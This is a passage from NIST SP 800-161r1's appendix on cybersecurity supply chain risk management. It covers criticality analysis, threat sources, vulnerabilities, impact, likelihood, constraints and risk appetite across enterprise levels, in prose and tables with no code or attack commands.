and firmware). Mission-critical processes also depend on information and processes (performed
by technology or people, to include support service contractors in some instances) that are used
to execute the critical processes. Those components and processes that underpin and enable
mission-critical processes or deliver defensive – and commonly shared – processes (e.g., access
control, identity management, and crypto) and unmediated access (e.g., power supply) should
also be considered critical. A criticality analysis is the primary method by which mission-critical
processes, associated systems/components, and enabling infrastructure and support services are
identified and prioritized. The criticality analysis also involves analyzing critical suppliers that
may not be captured by internal criticality analysis (e.g., supply chain interdependencies
including fourth- and fifth-party suppliers).
Enterprises will make criticality determinations as part of enterprise risk management activities
based on the process outlined in [NISTIR 8179].57 Where possible, C-SCRM should inherit
those assumptions and tailor/refine them to include the C-SCRM context. In C-SCRM, criticality
tailoring includes the initial criticality analysis of particular projects, products, and processes in
the supply chain in relation to critical processes at each Level. For example, at Level 1, the
enterprise may determine the criticality of holistic supplier relationships to the enterprise’s
overall strategic objectives. Then, at Level 2, the enterprise may assess the criticality of
individual suppliers, products, and services to specific mission and business processes and
strategic/operational objectives. Finally, at Level 3, the enterprise may assess the criticality of the
supplied product or service to specific operational state objectives of the information systems.
Enterprises may begin by identifying key supplier-provided products or services that contribute
to the operation and resiliency of enterprise processes and systems. Some of these elements may
be captured or defined as part of disaster recovery continuity of operations plans. The criticality
determination may be based on the role of each supplier, product, or service in achieving the
required strategic or operational objective of the process or system. Requirements, architecture,
and design inform the analysis and help identify the minimum set of supplier-provided products
and/or services required for operations (i.e., at enterprise, mission and business process, and
operational levels). The analysis combines top-down and bottom-up analysis approaches. The
top-down approach in this model enables the enterprise to identify critical processes and then
progressively narrow the analysis to critical systems that support those processes and critical
components that support the critical functions of those systems. The bottom-up approach
progressively traces the impact that a malfunctioning, compromised, or unavailable critical
component would have on the system and, in turn, on the related mission and business process.
Enterprises that perform this analysis should include agency system and cybersecurity supply
chain dependencies, to include critical fourth-party suppliers. For example, an enterprise may
57 See NISTIR 8179, Criticality Analysis Process Model: Prioritizing Systems and Components.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
260
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
find exposures to cybersecurity risks that result from third-party suppliers receiving critical input
or services from a common fourth-party supplier.
Determining criticality is an iterative process performed at all levels during both Frame and
Assess. In Frame, criticality determination is expected to be performed at a high level using the
available information with further detail incorporated through additional iterations or at the
Assess step. Determining criticality may include the following:
• Define criticality analysis procedures to ensure that there is a set of documented
procedures to guide the enterprise’s criticality analysis across levels.
• Conduct enterprise and mission-level criticality analysis to identify and prioritize
enterprise and mission objectives, goals, and requirements.
• Conduct operational-level criticality analysis (i.e., systems and sub-systems) to identify
and prioritize critical workflow paths, system functionalities, and capabilities.
• Conduct system and subsystem component-level criticality analysis to identify and
prioritize key system and subsystem inputs (e.g., COTS products).
• Conduct a detailed review (e.g., bottom-up analysis) of impacts and interactions between
enterprise, mission, system/sub-systems, and components/sub-components to ensure
cross-process interaction and collaboration.
Given the potential impact that a supply chain incident may have on an organization’s
operations, assets, and – in some instances – business partners or customers, it is important for
organizations to ensure that in addition to criticality, materiality considerations are built into their
supply chain risk management strategy, risk assessment practices, and overall governance of
supply chain risks. In contrast to criticality, materiality considers whether the information would
have been viewed by a reasonable investor making an investment decision as significantly
altering the total mix of information available to the shareholder.58 SEC guidance states:
…the materiality of cybersecurity risks and incidents also depends on the range of
harm that such incidents could cause. This includes harm to a company’s
reputation, financial performance, and customer and vendor relationships, as well
as the possibility of litigation or regulatory investigations or actions, including
regulatory actions by state and federal governmental authorities and non-U.S.
authorities.
Criticality can be determined for existing systems or for future system investments, development,
or integration efforts based on system architecture and design. It is an iterative activity that
should be performed when a change warranting iteration is identified in the Monitor step.
Threat Sources
For C-SCRM, threat sources include 1) adversarial threats, such as cyber/physical attacks to the
supply chain or to an information system component(s) traversing the supply chain; 2) accidental
human errors; 3) structural failures, including the failure of equipment, environmental controls,
and resource depletion; and 4) environmental threats, such as geopolitical disruptions,
58 Refer to the glossary for definition details.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
261
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
pandemics, economic upheavals, and natural or human-made disasters. With regard to
adversarial threats, [NIST SP 800-39] states that enterprises should provide a succinct
characterization of the types of tactics, techniques, and procedures employed by adversaries that
are to be addressed by safeguards and countermeasures (i.e., security controls) deployed at Level
1 (enterprise level), at Level 2 (mission and business process level), and at Level 3 (information
system/services level), making explicit the types of threat sources to be addressed and the threat
sources that are not addressed by the safeguards and countermeasures.
Threat information can include but is not limited to historical threat data, factual threat data, or
business entity (e.g., suppliers, developers, system integrators, external system service providers,
and other ICT/OT-related service providers) or technology-specific threat data. Threat
information may come from multiple information sources, including the U.S. Intelligence
Community (for federal agencies), DHS, CISA, the FBI, Information Sharing and Analysis
Centers (ISAC), and open source reporting, such as news and trade publications, partners,
suppliers, and customers. When applicable, enterprises may rely on the Federal Acquisition
Security Council’s (FASC) Information Sharing Agency (ISA) for supply chain threat
information in addition to the aforementioned sources. As threat information may include
classified intelligence, it is crucial that departments and agencies have the capabilities required to
process classified intelligence. Threat information obtained as part of the Frame step should be
used to document the enterprise’s long-term assumptions about threat conditions based on its
unique internal and external characteristics. During the Assess step, updated threat information is
infused into the risk assessment to account for short-term variations in threat conditions (e.g.,
due to geopolitical circumstances) that would impact decisions made concerning the
procurement of a product or service.
Information about the supply chain (such as supply chain maps) provides the context for
identifying possible locations or access points for threat sources and agents to affect the supply
chain. Supply chain cybersecurity threats are similar to information security threats, such as
disasters, attackers, or industrial spies. Table G-1 lists examples of supply chain cybersecurity
threat agents. Appendix G provides Risk Response Plans with examples of the Supply Chain
Threat Sources and Agents listed in Table G-1.
Table G-1: Examples of Supply Chain Cybersecurity Threat Sources and Agents
Threat Sources
Threat
Examples
Adversarial:
Counterfeiters
Counterfeits inserted
into supply chain (see
Appendix B, Scenario
1)
Criminal groups seek to acquire and sell
counterfeit cyber components for monetary
gain. Specifically, organized crime groups
seek disposed units, purchase overstock items,
and acquire blueprints to obtain cyber
components intended for sale through various
gray market resellers to acquirers.59
59 See [Defense Industrial Base Assessment: Counterfeit Electronics].
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
262
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Threat Sources
Threat
Examples
Adversarial:
Malicious Insiders
Intellectual property
loss
Disgruntled insiders sell or transfer
intellectual property to competitors or foreign
intelligence agencies for a variety of reasons,
including monetary gain. Intellectual property
includes software code, blueprints, or
documentation.
Adversarial:
Foreign
Intelligence
Services
Malicious code
insertion (see Appendix
B, Scenario 4)
Foreign intelligence services seek to penetrate
the supply chain and implant unwanted
functionality (by inserting new or modifying
existing functionality) into system to gather
information or subvert60 the system or mission
operations when system is operational.
Adversarial:
Terrorists
Unauthorized access
Terrorists seek to penetrate or disrupt the
supply chain and may implant unwanted
functionality to obtain information or cause
physical disablement and destruction of
systems through the supply chain.
Adversarial:
Industrial
Espionage/Cyber
Criminals
Industrial Espionage or
Intellectual Property
Loss (see Appendix B,
Scenario 2)
Industrial spies or cyber criminals seek ways
to penetrate the supply chain to gather
information or subvert system or mission
operations (e.g., exploitation of an HVAC
contractor to steal credit card information).
Adversarial:
Organized Cyber
Criminals
Ransomware leads to
the disruption of a
critical production
process
Cyber-criminal organizations target
enterprises with ransomware attacks in the
hopes of securing ransom payments for
monetary gain. Threat sources recognize that
enterprises, especially manufacturers, have
significant exposure to production disruptions.
60 Examples of subverting operations include gaining unauthorized control to the cybersecurity supply chain or flooding it with
unauthorized service requests to reduce or deny legitimate access.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
263
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Threat Sources
Threat
Examples
Systemic:
Legal/Regulatory
Legal or regulatory
complications impact
the availability of key
supplier-provided
products and/or services
Weak anti-corruption laws, a lack of
regulatory oversight, or weak intellectual
property considerations, including threats that
result from country-specific laws, policies,
and practices intended to undermine
competition and free market protections (e.g.,
the requirement to transfer technology and
intellectual property to domestic providers in a
foreign country).61
Systemic
Economic Risks
Business failure of a
key supplier leads to
supply chain disruption
Economic risks stem from threats to the
financial viability of suppliers and the
potential impact to the supply chain resulting
from the failure of a key supplier. Other
threats to the supply chain that result in
economic risks include vulnerabilities to cost
volatility, reliance on single-source suppliers,
the cost to swap out suspect vendors, and
resource constraints due to company size. 62
Systemic
Supply Disruptions
Production short-falls in
rare earth metals lead to
supply shortages for
critical production
inputs into semi-
conductors
A variety of systemic and structural failures
can cause supply shortage for products and
product components, especially in cases where
the source of supply is in a single
geographical location.
Environmental:
Disasters
Geopolitical or natural
disaster led to supply
chain disruption
The availability of key supply chain inputs is
subject to disruptions from geopolitical
upheavals or natural disasters. This is
especially the case when suppliers share a
common fourth-party supplier.
Structural:
Hardware Failure
Inadequate capacity
planning leads to outage
in a cloud platform
A vendor or supplier service without the
appropriate capacity controls in place could be
subject to disruptions in the event of
unexpected surges in resource demand.
61 Information and Communications Technology Supply Chain Risk Management Task Force: Threat Evaluation Working Group (v3), August
2021, https://www.cisa.gov/sites/default/files/publications/ict-scrm-task-force-threat-scenarios-report-v3.pdf. This report leveraged the 2015
version of the NIST SP 800-161.
62 Information and Communications Technology Supply Chain Risk Management Task Force: Threat Evaluation Working Group (v3), August
2021, https://www.cisa.gov/sites/default/files/publications/ict-scrm-task-force-threat-scenarios-report-v3.pdf. This report leveraged the 2015
version of the NIST SP 800-161.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
264
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Threat Sources
Threat
Examples
Accidental:
Negligent Insiders
Configuration error
leads to data exposure
Employees and contractors with access to
information systems are prone to errors that
could result in the disclosure of sensitive data.
This is specifically true in cases where
training lapses or process gaps increase the
opportunities for errors.
Agencies can identify and refine C-SCRM-specific threats in all three levels. Table G-2 provides
examples of threat considerations and different methods for characterizing supply chain
cybersecurity threats at different levels.
Table G-2: Supply Chain Cybersecurity Threat Considerations
Level
Threat Consideration
Methods
Level 1
• Enterprise business and
mission
• Strategic supplier
relationships
• Geographical
considerations related to
the extent of the
enterprise’s supply
chain
• Establish common starting points for identifying
supply chain cybersecurity threats.
• Establish procedures for countering enterprise-wide
threats, such as the insertion of counterfeits into
critical systems and components.
Level 2
• Mission and business
processes
• Geographic locations
• Types of suppliers (e.g.,
COTS, external service
providers, or custom)
• Technologies used
enterprise-wide
• Identify additional sources of threat information
specific to enterprise mission and business
processes.
• Identify potential threat sources based on the
locations and suppliers identified through
examining available agency cybersecurity supply
chain information (e.g., from supply chain map).
• Scope identified threat sources to the specific
mission and business processes using agency the
cybersecurity supply chain information.
• Establish mission-specific preparatory procedures
for countering threat adversaries and natural
disasters.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
265
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Level
Threat Consideration
Methods
Level 3
• SDLC
• Base the level of detail with which threats should
be considered on the SDLC phase.
• Identify and refine threat sources based on the
potential for threat insertion within individual
SDLC processes.
Vulnerabilities
A vulnerability is a weakness in an information system, system security procedures, internal
controls, or implementation that could be exploited or triggered by a threat source [NIST SP 800-
53, Rev. 5]. Within the C-SCRM context, it is any weakness in the supply chain, provided
services, system/component design, development, manufacturing, production, shipping and
receiving, delivery, operation, and component end-of-life that can be exploited by a threat
source. This definition applies to the services, systems, and components being developed and
integrated (i.e., within the SDLC) as well as to the supply chain, including any security
mitigations and techniques, such as identity management or access control systems.
Vulnerability assumptions made in the Frame step of the FARM process capture the enterprise’s
long-term assumptions about the their weaknesses that can be exploited or triggered by a threat
source. These will become further refined and updated to reflect point-in-time variances during
the Assess step. Enterprises may make long-term supply chain cybersecurity vulnerability
assumptions about:
• The entities within the supply chain itself (e.g., individual supplier relationships);
• The critical services provided through the supply chain that support the enterprise’s
critical mission and business processes;
• The products, systems, and components provided through the supply chain and used
within the SDLC (i.e., being developed and integrated);
• The development and operational environment that directly impacts the SDLC; and
• The logistics and delivery environment that transports systems and components (logically
or physically).
Vulnerabilities manifest differently across the three levels (i.e., enterprise, mission and business
process, information system). At Level 1, vulnerabilities present as susceptibilities of the
enterprise at large due to managerial and operating structures (e.g., policies, governance,
processes), conditions in the supply chain (e.g., concentration of products or services from a
single supplier), and characteristics of enterprise processes (e.g., use of a common system across
critical processes). At Level 2, vulnerabilities are specific to a mission and business process and
result from its operating structures and conditions, such as reliance on a specific system,
supplier-provided input, or service to achieve specific mission and business process operating
objectives. Level 2 vulnerabilities may vary widely across the different mission and business
processes. Within Level 3, vulnerabilities manifest as deficiencies or weaknesses in a supplied
product, the SDLC, system security procedures, internal controls, system implementations,
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
266
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
system inputs, or services provided through the supply chain (e.g., system components or
services).
Enterprises should identify approaches to characterizing supply chain cybersecurity
vulnerabilities that are consistent with the characterization of threat sources and events and with
the overall approach employed by the enterprise for characterizing vulnerabilities.
Vulnerabilities may be relevant to a single threat source or broadly applicable across threat
sources (adversarial, structural, environmental, accidental). For example, a single point of failure
in a network may be subject to disruptions caused by environmental threats (e.g., disasters) or
adversarial threats (terrorists). Appendix B provides examples of supply chain cybersecurity
threats, based on [NIST SP 800-30, Rev. 1, Appendix B].
All three levels should contribute to determining the enterprise’s approach to characterizing
vulnerabilities with progressively more detail identified and documented in the lower levels.
Table G-3 provides examples of considerations and different methods for characterizing supply
chain cybersecurity vulnerabilities at different levels.
Table G-3: Supply Chain Cybersecurity Vulnerability Considerations
Level
Vulnerability
Consideration
Methods
Level 1
• Enterprise mission and
business
• Holistic supplier
relationships (e.g., system
integrators, COTS,
external services)
• Geographical
considerations related to
the extent of the
enterprise’s supply chain
• Enterprise and Security
Architecture
• Criticality
• Examine agency cybersecurity supply chain
information, including supply chain maps, to
identify especially vulnerable entities,
locations, or enterprises.
• Analyze the agency mission for susceptibility
to potential supply chain cybersecurity
vulnerabilities.
• Examine third-party provider and supplier
relationships and interdependencies for
susceptibility to potential supply chain
cybersecurity vulnerabilities.
• Review enterprise architecture and criticality
to identify areas of weakness that require
more robust cybersecurity supply chain
considerations.
Level 2
• Mission and business
processes
• Geographic locations
• Mission and process level
supplier dependencies
(e.g., outsourced or
contracted services)
• Technologies used
• Refine analysis from Level 1 based on
specific mission and business processes and
applicable threat and supply chain
information.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
267
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Level
Vulnerability
Consideration
Methods
• If appropriate, use the National Vulnerability
Database (NVD) – including Common
Vulnerabilities and Exposures (CVE) and
Common Vulnerability Scoring System
(CVSS) – to characterize, categorize, and
score vulnerabilities63 or other acceptable
methodologies.
• Consider using scoring guidance to prioritize
vulnerabilities for remediation.
Level 3
• Individual technologies,
solutions, and services
• Supply chain SDLC
inputs, such as system
components or services
• Refine analysis based on inputs from related
Level 2 missions and business processes.
• Use CVEs where available to characterize
and categorize vulnerabilities.
• Identify weaknesses.
Impact and Harm
Impact is the effect on enterprise operations, enterprise assets, individuals, other enterprises, or
the Nation (including the national security interests of the United States) of a loss of
confidentiality, integrity, or availability of information or an information system [NIST SP 800-
53, Rev. 5]. Impact estimated within the Frame step represents the enterprise’s long-term
assumptions about the effects that different cybersecurity events may have on its primary
processes. These assumptions are updated and refined as part of the Assess step to ensure that
point-in-time relevant information (e.g., market conditions) that may alter the impact’s scope,
duration, or magnitude is appropriately reflected in the analysis.
When possible, enterprises should inherit assumptions made by the enterprise on consequences
and impact as part of enterprise risk management activities. For example, one of these activities
is performing a business impact analysis (BIA) to determine or revalidate mission-critical and
mission-enabling processes as part of the enterprise’s continuity and emergency preparedness
responsibilities. However, these assumptions may need to be developed if they do not yet exist.
Enterprises may maintain impact or harm libraries that capture the enterprise’s standing
assumptions about the impact or harm of different cybersecurity event types (e.g., disclosure,
disruption, destruction, modification) on the enterprise’s assets. These libraries may break down
impact and harm into individual impact types (e.g., operational, environmental, individual safety,
reputational, regulatory/legal fines and penalties, IT recovery/replacement, direct financial
damage to critical infrastructure sector).
63 See https://nvd.nist.gov/.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
268
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
For C-SCRM, enterprises should refine and update their consequences and impact assumptions
to reflect the role that the availability, confidentiality, and integrity of supplier-provided products
or services have on the enterprise’s operations, assets, and individuals. For example, depending
on its criticality, the loss of a key supplier-provided input or service may reduce the enterprise’s
operational capacity or completely inhibit its operations. In this publication, impact or harm is in
relation to the enterprise’s primary objectives and arises from products or services traversing the
supply chain or the supply chain itself.
C-SCRM consequences and impact will manifest differently across all three levels in the risk
management hierarchy. Impact determinations require a combined top-down and bottom-up
approach. Table G-4 provides examples of how consequences and impact may be characterized
at different levels of the enterprise.
Table G-4: Supply Chain Cybersecurity Consequence and Impact Considerations
Level
Impact Considerations
Methods
Level 1 • General enterprise-level
impact assumptions
• Supplier criticality (e.g.,
holistic supplier
relationships)
• Examine the magnitude of exposure to
individual entities within the supply chain.
• Refine Level 2 analysis to determine
aggregate Level 1 impacts on the enterprise’s
primary function resulting from
cybersecurity events to and through the
supply chain.
Level 2 • Process role in enterprise’s
primary function
• Supplier criticality to
mission/process (inputs and
services)
For each type of cybersecurity event:
• Refine Level 3 analysis to determine
aggregate mission and business process
impacts due to operational-level impacts
from cybersecurity events to and through the
supply chain.
• Examine supplier network to identify
business/mission-level impacts due to events
that affect individual supplier entities.
Level 3 • Criticality of upstream and
downstream Level 2
processes
• System criticality
• Supplier criticality to
system operations (system
components and services)
• Examine the system’s aggregated criticality
to Level 1 and Level 2 primary processes.
• Examine the criticality of supplied system
components or services to the system’s
overall function.
• Examine the supplier network to identify
individual entities that may disrupt the
availability of critical system inputs or
services.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
269
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Enterprises should look to several sources for information that helps contextualize consequences
and impact. Historical data is preferential and can be gathered by reviewing historical data for
the agency, similar peer enterprises, supplier organizations, or applicable industry surveys.
Where gaps in historical data exist, enterprises should consider the use of expert elicitation
protocols (e.g., calibrated estimation training), which make use of the tacit knowledge of
appropriate individuals across the enterprise. By interviewing well-positioned experts (e.g.,
technology or mission and business owners of assets), enterprises can tailor impact assumptions
to reflect the enterprise’s unique conditions and dependencies. [NISTIR 8286] offers a more in-
depth discussion of how different quantitative and qualitative methodologies can be used to
analyze risk.
The following are examples of cybersecurity supply chain consequences and impacts:
• An earthquake in Malaysia reduces the amount of commodity dynamic random-access
memory (DRAM) to 60 % of the world’s supply, creating a shortage for hardware
maintenance and new design.
• The accidental procurement of a counterfeit part results in premature component failure,
thereby impacting the enterprise’s mission performance.
•
Disruption at a key cloud service provider results in operational downtime losses between
$1.5 – $15 million dollars.
Likelihood
In an information security risk analysis, likelihood is a weighted factor based on a subjective
analysis of the probability that a given threat is capable of exploiting a given vulnerability
[CNSSI 4009]. General likelihood assumptions should be inherited from the enterprise’s
enterprise risk management process and refined to account for C-SCRM-specific implications.
However, the general assumptions may need to be developed if they do not yet exist. The
likelihood analysis in the Frame step sets the enterprise’s long-term assumptions about the
relative likelihood of different adverse cybersecurity events. Likelihood is subject to extreme
short-term variations based on point-in-time conditions (i.e., internal and external) and must be
updated and refined as part of the Assess step.
In adversarial cases, a likelihood determination may be made using intelligence trend data,
historical data, and expert intuition on 1) adversary intent, 2) adversary capability, and 3)
adversary targeting. In non-adversarial cases (e.g., structural, environmental, accidental),
likelihood determinations will draw on expert intuition and historical data. When available,
historical data may help further reduce uncertainty about which cybersecurity risks throughout
the supply chain are probable to occur. Organizations may find historical data by looking to
internal sources such as past incident trackers or external sources such as ISACs in order to
approximate the likelihood of experiencing different cyber events. Likelihood analysis can
leverage many of the same expert elicitation protocols as consequences and impact. Similar to
consequences and impact, likelihood determinations may rely on qualitative or quantitative
forms and draw on similar techniques. To ensure that likelihood is appropriately contextualized
for decision makers, enterprises should make time-bound likelihood estimates for cybersecurity
events that affect the supply chain (e.g., likelihood within a given year).
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
270
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Likelihood analysis will manifest differently across the three levels. Table G-5 captures some of
the considerations and methods specific to each level.
Table G-5: Supply Chain Cybersecurity Likelihood Considerations
Level
Likelihood Consideration
Methods
Level 1
• General threat and
likelihood assumptions for
the enterprise
• Level 2 and Level 3
likelihood findings
• Overall engagement
models with suppliers that
alter opportunities for
contact with threat sources
• Analyze critical national infrastructure
implications that may increase the
enterprise’s target value.
• Refine analyses from Level 2 and Level 3 to
determine aggregate exposure to threat
source contact.
Level 2
• Mission/process level
threat and likelihood
assumptions
• Mission/process level
engagement model with
suppliers (e.g., criticality
of assets interacted with)
• Level 3 findings for
relevant systems
• Evaluate mission and business process level
conditions that present opportunities for
threat sources to come into contact with
processes or assets via the supply chain.
• Evaluate the aggregate supply chain threat
conditions facing key systems relied on by
mission and business processes.
Level 3
• Enterprise system threat
and likelihood
assumptions
• Supplier and system target
value
• Location and operating
conditions
• Supplier and system
security policies,
processes, and controls
• Nature and degree of
supplier contact with
system (inputs, services)
• Analyze the nature of system inputs that
come through the supply chain into the
SDLC and that alter the likelihood of
encountering threat sources.
• Evaluate the system roles in Level 1 and
Level 2 processes that alter the target value
for potential adversaries.
• Analyze supply chain characteristics (e.g.,
location of supplier) that may increase the
likelihood that a system is affected by a
threat source.
Agencies should identify which approaches they will use to determine the likelihood of a supply
chain cybersecurity compromise, consistent with the overall approach used by the agency’s risk
management process. Agencies should ensure that appropriate procedures are in place to
thoroughly document any risk analysis assumptions that lead to the tabulation of the final risk
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
271
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
exposure, especially in cases where high or critical impact risks are involved. Visibility into
assumptions may be critical in enabling decision makers to take action.
RISK MANAGEMENT PROCESS CONSTRAINTS
TASK 1-2: Identify constraints64 on the conduct of risk assessment, risk response, and risk
monitoring activities within the enterprise.
Supplemental Guidance
Identify the following two types of constraints to ensure that the cybersecurity supply chain is
integrated into the agency risk management process:
1. Agency constraints
2. Supply chain-specific constraints
Agency constraints serve as an overall input to framing the cybersecurity supply chain policy at
Level 1, mission requirements at Level 2, and system-specific requirements at Level 3. Table G-
6 lists the specific agency and cybersecurity supply chain constraints. Supply chain constraints,
such as the C-SCRM policy and C-SCRM requirements, may need to be developed if they do not
exist.
Table G-6: Supply Chain Constraints
Level
Agency Constraints
Supply Chain Constraints
Level 1
• Enterprise policies,
strategies, and governance
• Applicable laws and
regulations
• Mission and business
processes
• Enterprise processes
(security, quality, etc.)
• Resource limitations
• Enterprise C-SCRM policy based on the
existing agency policies, strategies, and
governance; applicable laws and regulations;
mission and business processes; and
enterprise processes
• Acquisition regulations and policy
• Available, mandated, or restricted sources of
supply or products
Level 2
• Mission and business
processes
• Criticality of processes
• Enterprise architecture
• Mission-level security
policies
• C-SCRM mission and business requirements
that are incorporated into mission and
business processes and enterprise
architecture
• Supplier service contracts, product
warranties, and liability agreements
64 Refer to [NIST SP 800-39], Section 3.1, Task 1-2 for a description of constraints in the risk management context.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
272
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Level
Agency Constraints
Supply Chain Constraints
Level 3
• Functional requirements
• Security requirements
• Product and operational level C-SCRM
capabilities
• Supplier-provided system component
warranties and service agreements
One the primary methods by which constraints are articulated is via a policy statement or
directive. An enterprise’s C-SCRM policy is a critical vehicle for directing C-SCRM activities.
Driven by applicable laws and regulations, this policy should support enterprise policies,
including acquisition and procurement, information security, quality, and supply chain and
logistics. The C-SCRM policy should address the goals, objectives, and requirements articulated
by the overall agency strategic plan, mid-level mission and business process strategy, and
internal or external customers. The C-SCRM policy should also define the integration points for
C-SCRM with the agency’s Risk Management Process and SDLC.
C-SCRM policy should define the C-SCRM-related roles and responsibilities of the agency C-
SCRM team and any dependencies or interactions among those roles. C-SCRM-related roles will
articulate responsibilities for collecting supply chain cybersecurity threat intelligence, conducting
risk assessments, identifying and implementing risk-based mitigations, and performing
monitoring processes. Identifying and validating roles will help to specify the amount of effort
required to implement the C-SCRM plan. Examples of C-SCRM-related roles include:
• C-SCRM PMO that provides overarching guidance on cybersecurity risks throughout the
supply chain to engineering decisions that specify and select cyber products as the system
design is finalized
• Procurement officer and maintenance engineer responsible for identifying and replacing
defective hardware
• Delivery enterprise and acceptance engineers who verify that the system component is
acceptable to receive into the acquiring enterprise
• System integrator responsible for system maintenance and upgrades, whose staff resides
in the acquirer facility and uses system integrator development infrastructure and the
acquirer operational infrastructure
• System security engineer/systems engineer responsible for ensuring that information
system security concerns are properly identified and addressed throughout the SDLC
• The end user of cyber systems, components, and services
C-SCRM requirements should be guided by C-SCRM policies, mission and business processes,
their criticality at Level 2, and known functional and security requirements at Level 3.
RISK APPETITE AND TOLERANCE
TASK 1-3: Identify the levels of risk appetite and tolerance across the enterprise.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
273
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Supplemental Guidance
On a broad level, risk appetite represents the types and amount of risk that an enterprise is
willing to accept in pursuit of value [NISTIR 8286]. Conversely, risk tolerance is the enterprise
or stakeholder’s readiness to bear the remaining risk after a risk response in order to achieve their
objectives with the consideration that such tolerance can be influenced by legal or regulatory
requirements [NISTIR 8286]. This definition is adapted from COSO, which states that risk
tolerance is the acceptable level of variation relative to achievement of a specific objective.
Often, risk tolerance is best measured in the same units as those used to measure the related
objective [COSO 2011]. When establishing a risk management framework, it is recommended
that enterprises establish risk appetite and risk tolerance statements that set risk thresholds. Then,
where applicable, C-SCRM should align with risk appetite and tolerance statements from the
enterprise risk management process. Once established, risk appetite and risk tolerance should be
monitored and modified over time. For C-SCRM, these statements should be contextualized to
inform decisions in the C-SCRM domain. Those responsible for C-SCRM across the enterprise
should work with and support enterprise leaders on the development of C-SCRM-related risk
appetite and risk tolerance statements. This should be done in accordance with criteria provided
from the enterprise risk strategy (e.g., based on ERM risk categories).
Risk appetite and tolerance statements strongly influence the decisions made about C-SCRM
across the three levels. Some enterprises may define risk appetite and risk tolerance as part of
their broader enterprise risk management activities. In enterprises without a clearly defined risk
appetite, Level 1 stakeholders should collaborate with enterprise leadership to define and
articulate the enterprise’s appetite for risk within the scope of the C-SCRM program’s mandates.
Enterprises with multiple organizations may choose to tailor risk appetite statements for specific
organizations and mission and business processes. In general, risk appetite at Level 1 may be set
to empower the enterprise to meet its value objectives (e.g., high appetite for supplier risk in
support of reducing operating costs by 5 %). At Level 2 and Level 3, an organization’s risk
appetite statements are operationalized through risk tolerance statements. For example, an
organization with a low appetite for supply chain cybersecurity risk may issue risk tolerance
statements that necessitate restraint and control by Level 2 and Level 3 decision makers as they
pursue strategic value (e.g., tolerance statement crafted based on strict production targets for an
organization that supports a national security-related mission).
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
274
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Fig. G-4: Risk Appetite and Risk Tolerance
Together, risk appetite and risk tolerance provide expectations and acceptable boundaries for
performance against the organization’s strategic objectives. Figure G-4 illustrates how risk
appetite and risk tolerance may be used as guidelines for the organization’s operational decision
makers. Risk tolerance may be set with boundaries that exceed risk appetite to provide a degree
of flexibility for achieving the organization’s strategic objectives. However, operational decision
makers should strive to remain within risk appetite during normal conditions and exceed the
boundaries only as absolutely necessary (e.g., to capitalize on significant opportunities, avoid
highly adverse conditions). Observed periods of performance in the Review Zone, which lies
outside of risk appetite boundaries, should trigger a review of operational decisions and defined
risk appetite and tolerance statements. The review is critical to ensuring that the organization’s
appetite for risk remains appropriate and applicable given the organization’s internal and external
operating conditions. For example, an organization operating during a global pandemic may find
it necessary to take on additional levels of cyber risk exposure via alternative suppliers in order
to circumvent supply shortages. Figure G-5 below provides an illustrative risk appetite and risk
tolerance review process.
Performance
Time
Risk Appetite Risk Tolerance
Risk Universe
Risk Universe
Best Outcome
Worst Outcome
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
275
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Fig. G-5: Risk Appetite and Risk Tolerance Review Process
